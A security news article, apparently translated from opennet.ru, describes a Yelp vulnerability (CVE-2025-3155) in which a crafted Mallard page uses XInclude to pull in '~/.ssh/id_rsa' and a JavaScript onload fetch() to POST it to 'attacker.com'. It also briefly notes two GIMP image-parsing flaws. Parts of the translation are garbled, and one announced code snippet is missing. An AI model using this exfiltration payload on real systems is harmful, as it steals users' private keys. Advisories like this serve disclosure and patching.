A vulnerability (CVE-2025-3155) has been discovered in Yelp, the default browser for GNOME Help, allowing arbitrary JavaScript code execution when opening specially crafted page files. Executing such scripts allows the user's files to be sent to the attacker's server. You can track patches for the affected distributions on the following pages: Debian, Ubuntu, RHEL, SUSE/openSUSE, Fedora, Arch, FreeBSD.
In GNOME, a "ghelp://" URI is registered to open help files, which is handled by calling Yelp. To perform the attack, the attacker needs to get their index.page file to download to the user's system. For example, they can trick the user into downloading the file through the browser by clicking on a link on the attacker's site. Once the file is downloaded, the attacker can initiate the opening of this document by redirecting the browser from their page to the "ghelp://" URL with the path to the directory where the file is downloaded. For example, "ghelp:///proc/self/cwd/Downloads", where the path "/proc/self/cwd" is associated with the working directory of the current process (when running yelp, this would be the user's home directory).
The vulnerability is caused by the use of the XML-based Mallard format in page files. This format allows the content of other files to be inserted into the document using the XInclude mechanism. To render page files, Yelp converts them from XML to HTML using XSLT (yelp-xsl), and then displays them using the WebKitGtk engine. The idea is to inject JavaScript into the resulting HTML file and use this JavaScript to send it to server content substituted via XInclude.
JavaScript substitution is done by using XSLT to copy some elements into HTML without parsing, for example, by transferring the entire element and all embedded content. Thus, for transmission to external server To create the file "~/.ssh/id_rsa", simply insert it into the page document using the "include" directive:
Then add via element JavaScript call with code to send a POST request to an external server using the fetch() function: onload=_=>fetch("http://attacker.com/",{method:"POST",body:document.body.outerHTML,mode:"no-cors"})
Additionally, two vulnerabilities (CVE-2025-2761, CVE-2025-2760) in the GIMP graphics editor can be noted, leading to the execution of attacker code when the user opens specially prepared images in the XWD and FLI formats. Both vulnerabilities are caused by the lack of proper verification of the size of data copied to the buffer during the parsing of file contents. The vulnerabilities are fixed in GIMP version 3.0.0.
Source: opennet.ru
